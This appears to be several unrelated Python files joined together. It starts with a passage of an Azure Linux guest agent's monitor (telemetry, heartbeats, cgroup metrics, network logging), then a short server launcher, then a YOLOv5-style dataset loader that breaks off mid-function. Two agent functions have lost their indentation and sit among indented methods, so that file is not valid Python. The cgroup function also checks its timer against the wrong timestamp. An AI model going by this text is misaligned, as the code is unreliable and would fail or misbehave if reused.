        try:
            vminfo = self.protocol.get_vminfo()
            self.sysinfo.append(TelemetryEventParam("VMName",
                                                    vminfo.vmName))
            self.sysinfo.append(TelemetryEventParam("TenantName",
                                                    vminfo.tenantName))
            self.sysinfo.append(TelemetryEventParam("RoleName",
                                                    vminfo.roleName))
            self.sysinfo.append(TelemetryEventParam("RoleInstanceName",
                                                    vminfo.roleInstanceName))
            self.sysinfo.append(TelemetryEventParam("ContainerId",
                                                    vminfo.containerId))
        except ProtocolError as e:
            logger.warn("Failed to get system info: {0}", e)
        # Azure placement facts from IMDS
        try:
            vminfo = self.imds_client.get_compute()
            self.sysinfo.append(TelemetryEventParam('Location',
                                                    vminfo.location))
            self.sysinfo.append(TelemetryEventParam('SubscriptionId',
                                                    vminfo.subscriptionId))
            self.sysinfo.append(TelemetryEventParam('ResourceGroupName',
                                                    vminfo.resourceGroupName))
            self.sysinfo.append(TelemetryEventParam('VMId',
                                                    vminfo.vmId))
            self.sysinfo.append(TelemetryEventParam('ImageOrigin',
                                                    vminfo.image_origin))
        except (HttpError, ValueError) as e:
            logger.warn("failed to get IMDS info: {0}", e)
    def collect_event(self, evt_file_name):
        # Read one queued telemetry event file, delete it, and return its
        # decoded text; IO failures are wrapped as EventError.
        try:
            logger.verbose("Found event file: {0}", evt_file_name)
            with open(evt_file_name, "rb") as evt_file:
                # if fail to open or delete the file, throw exception
                data_str = evt_file.read().decode("utf-8", 'ignore')
                logger.verbose("Processed event file: {0}", evt_file_name)
                os.remove(evt_file_name)
                return data_str
        except IOError as e:
            msg = "Failed to process {0}, {1}".format(evt_file_name, e)
            raise EventError(msg)
    def collect_and_send_events(self):
        # Every EVENT_COLLECTION_PERIOD: gather queued *.tld event files,
        # attach system info, and report the batch over the wire protocol.
        if self.last_event_collection is None:
            self.last_event_collection = datetime.datetime.utcnow() - MonitorHandler.EVENT_COLLECTION_PERIOD

        if datetime.datetime.utcnow() >= (self.last_event_collection + MonitorHandler.EVENT_COLLECTION_PERIOD):
            try:
                event_list = TelemetryEventList()
                event_dir = os.path.join(conf.get_lib_dir(), "events")
                event_files = os.listdir(event_dir)
                for event_file in event_files:
                    # only telemetry payload files are processed
                    if not event_file.endswith(".tld"):
                        continue
                    event_file_path = os.path.join(event_dir, event_file)
                    try:
                        data_str = self.collect_event(event_file_path)
                    except EventError as e:
                        logger.error("{0}", e)
                        continue
                    try:
                        event = parse_event(data_str)
                        self.add_sysinfo(event)
                        event_list.events.append(event)
                    except (ValueError, ProtocolError) as e:
                        # skip undecodable files; they were already deleted
                        logger.warn("Failed to decode event file: {0}", e)
                        continue

                if len(event_list.events) == 0:
                    return

                try:
                    self.protocol.report_event(event_list)
                except ProtocolError as e:
                    logger.error("{0}", e)
            except Exception as e:
                logger.warn("Failed to send events: {0}", e)

            self.last_event_collection = datetime.datetime.utcnow()
    def daemon(self):
        # Tick at the shortest of the periodic-task periods so no task's
        # schedule slips by more than one tick; each task checks its own
        # period internally and no-ops when not yet due.
        min_delta = min(MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD,
                        MonitorHandler.CGROUP_TELEMETRY_PERIOD,
                        MonitorHandler.EVENT_COLLECTION_PERIOD,
                        MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD,
                        MonitorHandler.IMDS_HEARTBEAT_PERIOD).seconds
        while self.should_run:
            self.send_telemetry_heartbeat()
            self.send_cgroup_telemetry()
            self.collect_and_send_events()
            self.send_host_plugin_heartbeat()
            self.send_imds_heartbeat()
            self.log_altered_network_configuration()
            time.sleep(min_delta)
def add_sysinfo(self, event):
sysinfo_names = [v.name for v in self.sysinfo]
for param in event.parameters:
if param.name in sysinfo_names:
logger.verbose("Remove existing event parameter: [{0}:{1}]",
param.name,
param.value)
event.parameters.remove(param)
event.parameters.extend(self.sysinfo)
    def send_imds_heartbeat(self):
        """
        Send a health signal every IMDS_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have
        successfully called and validated a response in the last IMDS_HEALTH_PERIOD.
        """
        if self.last_imds_heartbeat is None:
            self.last_imds_heartbeat = datetime.datetime.utcnow() - MonitorHandler.IMDS_HEARTBEAT_PERIOD

        if datetime.datetime.utcnow() >= (self.last_imds_heartbeat + MonitorHandler.IMDS_HEARTBEAT_PERIOD):
            try:
                is_currently_healthy, response = self.imds_client.validate()

                if is_currently_healthy:
                    self.imds_errorstate.reset()
                else:
                    self.imds_errorstate.incr()

                # healthy until the error state accumulates past its threshold
                is_healthy = self.imds_errorstate.is_triggered() is False
                logger.verbose("IMDS health: {0} [{1}]", is_healthy, response)

                self.health_service.report_imds_status(is_healthy, response)

            except Exception as e:
                # report the failure as a telemetry event rather than crashing
                msg = "Exception sending imds heartbeat: {0}".format(ustr(e))
                add_event(
                    name=AGENT_NAME,
                    version=CURRENT_VERSION,
                    op=WALAEventOperation.ImdsHeartbeat,
                    is_success=False,
                    message=msg,
                    log_event=False)

            self.last_imds_heartbeat = datetime.datetime.utcnow()
    def send_host_plugin_heartbeat(self):
        """
        Send a health signal every HOST_PLUGIN_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have been able to
        communicate with HostGAPlugin at least once in the last HOST_PLUGIN_HEALTH_PERIOD.
        """
        if self.last_host_plugin_heartbeat is None:
            self.last_host_plugin_heartbeat = datetime.datetime.utcnow() - MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD

        if datetime.datetime.utcnow() >= (
                self.last_host_plugin_heartbeat + MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD):
            try:
                host_plugin = self.protocol.client.get_host_plugin()
                host_plugin.ensure_initialized()
                is_currently_healthy = host_plugin.get_health()

                if is_currently_healthy:
                    self.host_plugin_errorstate.reset()
                else:
                    self.host_plugin_errorstate.incr()

                # healthy until the error state accumulates past its threshold
                is_healthy = self.host_plugin_errorstate.is_triggered() is False
                logger.verbose("HostGAPlugin health: {0}", is_healthy)

                self.health_service.report_host_plugin_heartbeat(is_healthy)

                if not is_healthy:
                    # record how long the plugin has been unhealthy
                    add_event(
                        name=AGENT_NAME,
                        version=CURRENT_VERSION,
                        op=WALAEventOperation.HostPluginHeartbeatExtended,
                        is_success=False,
                        message='{0} since successful heartbeat'.format(self.host_plugin_errorstate.fail_time),
                        log_event=False)

            except Exception as e:
                # report the failure as a telemetry event rather than crashing
                msg = "Exception sending host plugin heartbeat: {0}".format(ustr(e))
                add_event(
                    name=AGENT_NAME,
                    version=CURRENT_VERSION,
                    op=WALAEventOperation.HostPluginHeartbeat,
                    is_success=False,
                    message=msg,
                    log_event=False)

            self.last_host_plugin_heartbeat = datetime.datetime.utcnow()
    def send_telemetry_heartbeat(self):
        """
        Emit the agent heartbeat telemetry event every TELEMETRY_HEARTBEAT_PERIOD, and an additional
        HttpErrors event whenever I/O errors were counted since the previous heartbeat.
        """
        if self.last_telemetry_heartbeat is None:
            # Backdate the first timestamp so a heartbeat fires immediately on startup.
            self.last_telemetry_heartbeat = datetime.datetime.utcnow() - MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD
        if datetime.datetime.utcnow() >= (self.last_telemetry_heartbeat + MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD):
            try:
                incarnation = self.protocol.get_incarnation()
                dropped_packets = self.osutil.get_firewall_dropped_packets(self.protocol.endpoint)
                # Heartbeat payload format: incarnation;counter;heartbeat_id;dropped_packets
                msg = "{0};{1};{2};{3}".format(incarnation, self.counter, self.heartbeat_id, dropped_packets)
                add_event(
                    name=AGENT_NAME,
                    version=CURRENT_VERSION,
                    op=WALAEventOperation.HeartBeat,
                    is_success=True,
                    message=msg,
                    log_event=False)
                self.counter += 1  # monotonically increasing beat number
                # Counters accumulate since the last heartbeat; reading them resets them.
                io_errors = IOErrorCounter.get_and_reset()
                hostplugin_errors = io_errors.get("hostplugin")
                protocol_errors = io_errors.get("protocol")
                other_errors = io_errors.get("other")
                if hostplugin_errors > 0 or protocol_errors > 0 or other_errors > 0:
                    msg = "hostplugin:{0};protocol:{1};other:{2}".format(hostplugin_errors,
                                                                         protocol_errors,
                                                                         other_errors)
                    add_event(
                        name=AGENT_NAME,
                        version=CURRENT_VERSION,
                        op=WALAEventOperation.HttpErrors,
                        is_success=True,
                        message=msg,
                        log_event=False)
            except Exception as e:
                # Best-effort: heartbeat failures are logged but never crash the monitor loop.
                logger.warn("Failed to send heartbeat: {0}", e)
            self.last_telemetry_heartbeat = datetime.datetime.utcnow()
    @staticmethod
    def init_cgroups():
        """Set up cgroup tracking for the agent; failures are logged as warnings, never raised."""
        # Track metrics for the wrapper cgroup and for the agent cgroup
        try:
            # This creates the wrapper cgroup for everything under agent,
            # /sys/fs/cgroup/{cpu,memory}/WALinuxAgent/
            # There is no need in tracking this cgroup, as it only serves
            # as an umbrella for the agent and extensions cgroups
            CGroups.for_extension("")
            # This creates the agent's cgroup (for the daemon and extension handler)
            # /sys/fs/cgroup/{cpu,memory}/WALinuxAgent/WALinuxAgent
            # If the system is using systemd, it would have already been set up under /system.slice
            CGroupsTelemetry.track_agent()
        except Exception as e:
            # when a hierarchy is not mounted, we raise an exception
            # and we should therefore only issue a warning, since this
            # is not unexpected
            logger.warn("Monitor: cgroups not initialized: {0}", ustr(e))
            logger.verbose(traceback.format_exc())
def send_cgroup_telemetry(self):
if self.last_cgroup_telemetry is None:
self.last_cgroup_telemetry = datetime.datetime.utcnow()
if datetime.datetime.utcnow() >= (self.last_telemetry_heartbeat + MonitorHandler.CGROUP_TELEMETRY_PERIOD):
try:
metric_reported, metric_threshold = CGroupsTelemetry.collect_all_tracked()
for cgroup_name, metrics in metric_reported.items():
thresholds = metric_threshold[cgroup_name]
for metric_group, metric_name, value in metrics:
if value > 0:
report_metric(metric_group, metric_name, cgroup_name, value)
if metric_group == "Memory":
# Memory is collected in bytes, and limit is set in megabytes.
if value >= CGroups._format_memory_value('megabytes', thresholds.memory_limit):
msg = "CGroup {0}: Crossed the Memory Threshold. " \
"Current Value: {1} bytes, Threshold: {2} megabytes." \
.format(cgroup_name, value, thresholds.memory_limit)
logger.warn(msg)
add_event(name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.CGroupsLimitsCrossed,
is_success=True,
message=msg,
log_event=True)
if metric_group == "Process":
if value >= thresholds.cpu_limit:
msg = "CGroup {0}: Crossed the Processor Threshold. " \
"Current Value: {1}, Threshold: {2}." \
.format(cgroup_name, value, thresholds.cpu_limit)
logger.warn(msg)
add_event(name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.CGroupsLimitsCrossed,
is_success=True,
message=msg,
log_event=True)
except Exception as e:
logger.warn("Monitor: failed to collect cgroups performance metrics: {0}", ustr(e))
logger.verbose(traceback.format_exc())
# Look for extension cgroups we're not already tracking and track them
try:
CGroupsTelemetry.update_tracked(self.protocol.client.get_current_handlers())
except Exception as e:
logger.warn("Monitor: failed to update cgroups tracked extensions: {0}", ustr(e))
logger.verbose(traceback.format_exc())
self.last_cgroup_telemetry = datetime.datetime.utcnow()
    def log_altered_network_configuration(self):
        """
        Check various pieces of network configuration and, if altered since the last check, log the new state.
        """
        # Hash the raw route table so an unchanged table costs only a digest comparison.
        raw_route_list = self.osutil.read_route_table()
        digest = hash_strings(raw_route_list)
        if digest != self.last_route_table_hash:
            self.last_route_table_hash = digest
            route_list = self.osutil.get_list_of_routes(raw_route_list)
            logger.info("Route table: [{0}]".format(",".join(map(networkutil.RouteEntry.to_json, route_list))))
        nic_state = self.osutil.get_nic_state()
        if nic_state != self.last_nic_state:
            # The first observation (empty previous state) is logged as "Initial".
            description = "Initial" if self.last_nic_state == {} else "Updated"
            logger.info("{0} NIC state: [{1}]".format(description, ", ".join(map(str, nic_state.values()))))
            self.last_nic_state = nic_state
|
run.py | from web_frontend import app
from model_server import start_model_server
from threading import Thread
# Run the model server in a background thread so the web frontend can serve alongside it.
model_server_thread = Thread(target=start_model_server)
model_server_thread.start()
# NOTE(review): app.run() blocks here; the non-daemon model-server thread keeps the
# process alive even after the web server stops — confirm this is intended.
app.run()
|
datasets.py | import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
# Resolve the numeric EXIF tag id whose name is 'Orientation'; the loop intentionally
# leaves it bound in the module-level name `orientation`, which exif_size() reads.
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def get_hash(files):
    """Return a cheap aggregate "hash" of *files*: the total size in bytes of those that exist."""
    total = 0
    for f in files:
        if os.path.isfile(f):
            total += os.path.getsize(f)
    return total
def exif_size(img):
    """
    Return the EXIF-corrected (width, height) of a PIL image.

    EXIF orientations 6 and 8 encode 270/90-degree rotations, so width and height
    are swapped for them; any failure to read EXIF data (no EXIF block, no
    orientation tag) falls back to the raw size.
    """
    s = img.size  # (width, height)
    try:
        rotation = dict(img._getexif().items())[orientation]
        if rotation == 6:  # rotation 270
            s = (s[1], s[0])
        elif rotation == 8:  # rotation 90
            s = (s[1], s[0])
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt still
        # propagate; the EXIF lookup itself remains best-effort.
        pass
    return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
                      local_rank=-1, world_size=1):
    """
    Build a LoadImagesAndLabels dataset and its torch DataLoader.

    Returns (dataloader, dataset). In DDP mode (local_rank != -1) a DistributedSampler
    is attached and worker count is divided across *world_size* processes.
    """
    # Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
    with torch_distributed_zero_first(local_rank):
        dataset = LoadImagesAndLabels(path, imgsz, batch_size,
                                      augment=augment,  # augment images
                                      hyp=hyp,  # augmentation hyperparameters
                                      rect=rect,  # rectangular training
                                      cache_images=cache,
                                      single_cls=opt.single_cls,
                                      stride=int(stride),
                                      pad=pad)

    # The dataset may hold fewer images than the requested batch size.
    batch_size = min(batch_size, len(dataset))
    nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, 8])  # number of workers
    train_sampler = torch.utils.data.distributed.DistributedSampler(dataset) if local_rank != -1 else None
    dataloader = torch.utils.data.DataLoader(dataset,
                                             batch_size=batch_size,
                                             num_workers=nw,
                                             sampler=train_sampler,
                                             pin_memory=True,
                                             collate_fn=LoadImagesAndLabels.collate_fn)
    return dataloader, dataset
class LoadImages:  # for inference
    """
    Iterator over images and/or videos found at *path* for inference.
    Each step yields (path, letterboxed CHW RGB image, original BGR image, video capture or None).
    """
    def __init__(self, path, img_size=640):
        # Resolve *path* (glob pattern, directory, or single file) to a concrete file list.
        p = str(Path(path))  # os-agnostic
        p = os.path.abspath(p)  # absolute path
        if '*' in p:
            files = sorted(glob.glob(p))  # glob
        elif os.path.isdir(p):
            files = sorted(glob.glob(os.path.join(p, '*.*')))  # dir
        elif os.path.isfile(p):
            files = [p]  # files
        else:
            raise Exception('ERROR: %s does not exist' % p)

        # Split by extension; videos are decoded frame by frame after all images.
        images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
        videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
        ni, nv = len(images), len(videos)

        self.img_size = img_size
        self.files = images + videos
        self.nf = ni + nv  # number of files
        self.video_flag = [False] * ni + [True] * nv
        self.mode = 'images'
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
                            (p, img_formats, vid_formats)

    def __iter__(self):
        self.count = 0
        return self

    def __next__(self):
        """Return the next frame as (path, letterboxed CHW RGB image, original BGR image, cap)."""
        if self.count == self.nf:
            raise StopIteration
        path = self.files[self.count]

        if self.video_flag[self.count]:
            # Read video
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                # Current video exhausted: advance to the next file, or stop after the last one.
                self.count += 1
                self.cap.release()
                if self.count == self.nf:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()

            self.frame += 1
            print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')

        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            print('image %g/%g %s: ' % (self.count, self.nf, path), end='')

        # Padded resize
        img = letterbox(img0, new_shape=self.img_size)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        # cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1])  # save letterbox image
        return path, img, img0, self.cap

    def new_video(self, path):
        # Open a new capture and reset the per-video frame counters.
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nf  # number of files
class LoadWebcam:  # for inference
    """Iterator over frames from a local webcam (pipe=0) or an IP-camera/GStreamer pipe for inference."""
    def __init__(self, pipe=0, img_size=640):
        self.img_size = img_size

        if pipe == '0':
            pipe = 0  # local camera
        # pipe = 'rtsp://192.168.1.64/1'  # IP camera
        # pipe = 'rtsp://username:password@192.168.1.64/1'  # IP camera with login
        # pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa'  # IP traffic camera
        # pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg'  # IP golf camera

        # https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
        # pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink'  # GStreamer

        # https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
        # https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package  # install help
        # pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink"  # GStreamer

        self.pipe = pipe
        self.cap = cv2.VideoCapture(pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        """Grab the next frame; pressing 'q' in the cv2 window releases the camera and stops iteration."""
        self.count += 1
        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration

        # Read frame
        if self.pipe == 0:  # local camera
            ret_val, img0 = self.cap.read()
            img0 = cv2.flip(img0, 1)  # flip left-right
        else:  # IP camera
            n = 0
            while True:
                n += 1
                self.cap.grab()
                if n % 30 == 0:  # skip frames
                    ret_val, img0 = self.cap.retrieve()
                    if ret_val:
                        break

        # Print
        assert ret_val, 'Camera Error %s' % self.pipe
        img_path = 'webcam.jpg'
        print('webcam %g: ' % self.count, end='')

        # Padded resize
        img = letterbox(img0, new_shape=self.img_size)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return img_path, img, img0, None

    def __len__(self):
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """
    Read several video streams concurrently: one daemon thread per source keeps
    self.imgs[i] updated with the latest frame, and iteration yields all streams batched.
    """
    def __init__(self, sources='streams.txt', img_size=640):
        self.mode = 'images'
        self.img_size = img_size

        # *sources* is either a text file with one URL per line, or a single URL/device id.
        if os.path.isfile(sources):
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
        else:
            sources = [sources]

        n = len(sources)
        self.imgs = [None] * n
        self.sources = sources
        for i, s in enumerate(sources):
            # Start the thread to read frames from the video stream
            print('%g/%g: %s... ' % (i + 1, n, s), end='')
            cap = cv2.VideoCapture(0 if s == '0' else s)
            assert cap.isOpened(), 'Failed to open %s' % s
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            fps = cap.get(cv2.CAP_PROP_FPS) % 100
            _, self.imgs[i] = cap.read()  # guarantee first frame
            thread = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
            thread.start()
        print('')  # newline

        # check for common shapes
        s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0)  # inference shapes
        self.rect = np.unique(s, axis=0).shape[0] == 1  # rect inference if all shapes equal
        if not self.rect:
            print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')

    def update(self, index, cap):
        # Read next stream frame in a daemon thread
        n = 0
        while cap.isOpened():
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n == 4:  # read every 4th frame
                _, self.imgs[index] = cap.retrieve()
                n = 0
            time.sleep(0.01)  # wait time

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        """Return (sources, batched letterboxed BSxCHW RGB images, latest raw frames, None)."""
        self.count += 1
        img0 = self.imgs.copy()
        if cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration

        # Letterbox
        img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]

        # Stack
        img = np.stack(img, 0)

        # Convert
        img = img[:, :, :, ::-1].transpose(0, 3, 1, 2)  # BGR to RGB, to bsx3x416x416
        img = np.ascontiguousarray(img)

        return self.sources, img, img0, None

    def __len__(self):
        return 0  # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset):  # for training/testing
    """
    Dataset of images plus YOLO-format label files for training/testing.

    Labels are cached into a '<labels_dir>.cache' torch file keyed by a hash of all
    file sizes, so repeated runs skip the per-image scan. FIX: the deprecated
    `np.int` alias (removed in NumPy 1.24) was replaced with the builtin `int`
    in the astype() calls; the produced values are identical.
    """

    def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
                 cache_images=False, single_cls=False, stride=32, pad=0.0):
        # Gather image files: *path* may be a list, a directory, or a list-file of paths.
        try:
            f = []  # image files
            for p in path if isinstance(path, list) else [path]:
                p = str(Path(p))  # os-agnostic
                parent = str(Path(p).parent) + os.sep
                if os.path.isfile(p):  # file
                    with open(p, 'r') as t:
                        t = t.read().splitlines()
                        f += [x.replace('./', parent) if x.startswith('./') else x for x in t]  # local to global path
                elif os.path.isdir(p):  # folder
                    f += glob.iglob(p + os.sep + '*.*')
                else:
                    raise Exception('%s does not exist' % p)
            self.img_files = sorted(
                [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
        except Exception as e:
            raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))

        n = len(self.img_files)
        assert n > 0, 'No images found in %s. See %s' % (path, help_url)
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index (was np.int; alias removed in NumPy 1.24)
        nb = bi[-1] + 1  # number of batches

        self.n = n  # number of images
        self.batch = bi  # batch index of image
        self.img_size = img_size
        self.augment = augment
        self.hyp = hyp
        self.image_weights = image_weights
        self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
        self.mosaic_border = [-img_size // 2, -img_size // 2]
        self.stride = stride

        # Define labels: each image's label file lives under 'labels/' with a .txt suffix.
        self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
                            self.img_files]

        # Check cache
        cache_path = str(Path(self.label_files[0]).parent) + '.cache'  # cached labels
        if os.path.isfile(cache_path):
            cache = torch.load(cache_path)  # load
            if cache['hash'] != get_hash(self.label_files + self.img_files):  # dataset changed
                cache = self.cache_labels(cache_path)  # re-cache
        else:
            cache = self.cache_labels(cache_path)  # cache

        # Get labels
        labels, shapes = zip(*[cache[x] for x in self.img_files])
        self.shapes = np.array(shapes, dtype=np.float64)
        self.labels = list(labels)

        # Rectangular Training  https://github.com/ultralytics/yolov3/issues/232
        if self.rect:
            # Sort by aspect ratio
            s = self.shapes  # wh
            ar = s[:, 1] / s[:, 0]  # aspect ratio
            irect = ar.argsort()
            self.img_files = [self.img_files[i] for i in irect]
            self.label_files = [self.label_files[i] for i in irect]
            self.labels = [self.labels[i] for i in irect]
            self.shapes = s[irect]  # wh
            ar = ar[irect]

            # Set training image shapes
            shapes = [[1, 1]] * nb
            for i in range(nb):
                ari = ar[bi == i]
                mini, maxi = ari.min(), ari.max()
                if maxi < 1:
                    shapes[i] = [maxi, 1]
                elif mini > 1:
                    shapes[i] = [1, 1 / mini]

            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride

        # Cache labels
        create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
        nm, nf, ne, ns, nd = 0, 0, 0, 0, 0  # number missing, found, empty, datasubset, duplicate
        pbar = tqdm(self.label_files)
        for i, file in enumerate(pbar):
            l = self.labels[i]  # label
            if l.shape[0]:
                assert l.shape[1] == 5, '> 5 label columns: %s' % file
                assert (l >= 0).all(), 'negative labels: %s' % file
                assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
                if np.unique(l, axis=0).shape[0] < l.shape[0]:  # duplicate rows
                    nd += 1  # print('WARNING: duplicate rows in %s' % self.label_files[i])  # duplicate rows
                if single_cls:
                    l[:, 0] = 0  # force dataset into single-class mode
                self.labels[i] = l
                nf += 1  # file found

                # Create subdataset (a smaller dataset)
                if create_datasubset and ns < 1E4:
                    if ns == 0:
                        create_folder(path='./datasubset')
                        os.makedirs('./datasubset/images')
                    exclude_classes = 43
                    if exclude_classes not in l[:, 0]:
                        ns += 1
                        # shutil.copy(src=self.img_files[i], dst='./datasubset/images/')  # copy image
                        with open('./datasubset/images.txt', 'a') as f:
                            f.write(self.img_files[i] + '\n')

                # Extract object detection boxes for a second stage classifier
                if extract_bounding_boxes:
                    p = Path(self.img_files[i])
                    img = cv2.imread(str(p))
                    h, w = img.shape[:2]
                    for j, x in enumerate(l):
                        f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
                        if not os.path.exists(Path(f).parent):
                            os.makedirs(Path(f).parent)  # make new output folder

                        b = x[1:] * [w, h, w, h]  # box
                        b[2:] = b[2:].max()  # rectangle to square
                        b[2:] = b[2:] * 1.3 + 30  # pad
                        b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)  # was np.int

                        b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                        b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                        assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
            else:
                ne += 1  # print('empty labels for image %s' % self.img_files[i])  # file empty
                # os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i]))  # remove

            pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
                cache_path, nf, nm, ne, nd, n)
        if nf == 0:
            s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
            print(s)
            assert not augment, '%s. Can not train without labels.' % s

        # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
        self.imgs = [None] * n
        if cache_images:
            gb = 0  # Gigabytes of cached images
            pbar = tqdm(range(len(self.img_files)), desc='Caching images')
            self.img_hw0, self.img_hw = [None] * n, [None] * n
            for i in pbar:  # max 10k images
                self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i)  # img, hw_original, hw_resized
                gb += self.imgs[i].nbytes
                pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)

    def cache_labels(self, path='labels.cache'):
        """Scan every image/label pair, validate them, and torch.save the mapping to *path*."""
        # Cache dataset labels, check images and read shapes
        x = {}  # dict
        pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
        for (img, label) in pbar:
            try:
                l = []
                image = Image.open(img)
                image.verify()  # PIL verify
                # _ = io.imread(img)  # skimage verify (from skimage import io)
                shape = exif_size(image)  # image size
                assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
                if os.path.isfile(label):
                    with open(label, 'r') as f:
                        l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)  # labels
                if len(l) == 0:
                    l = np.zeros((0, 5), dtype=np.float32)
                x[img] = [l, shape]
            except Exception as e:
                # Unreadable image/label: record a null entry and keep scanning.
                x[img] = [None, None]
                print('WARNING: %s: %s' % (img, e))

        x['hash'] = get_hash(self.label_files + self.img_files)
        torch.save(x, path)  # save for next time
        return x

    def __len__(self):
        return len(self.img_files)

    # def __iter__(self):
    #     self.count = -1
    #     print('ran dataset iter')
    #     #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
    #     return self

    def __getitem__(self, index):
        """Return (image tensor CHW RGB, labels tensor (nL, 6), image path, shapes-or-None) for item *index*."""
        if self.image_weights:
            index = self.indices[index]

        hyp = self.hyp
        if self.mosaic:
            # Load mosaic
            img, labels = load_mosaic(self, index)
            shapes = None

            # MixUp https://arxiv.org/pdf/1710.09412.pdf
            if random.random() < hyp['mixup']:
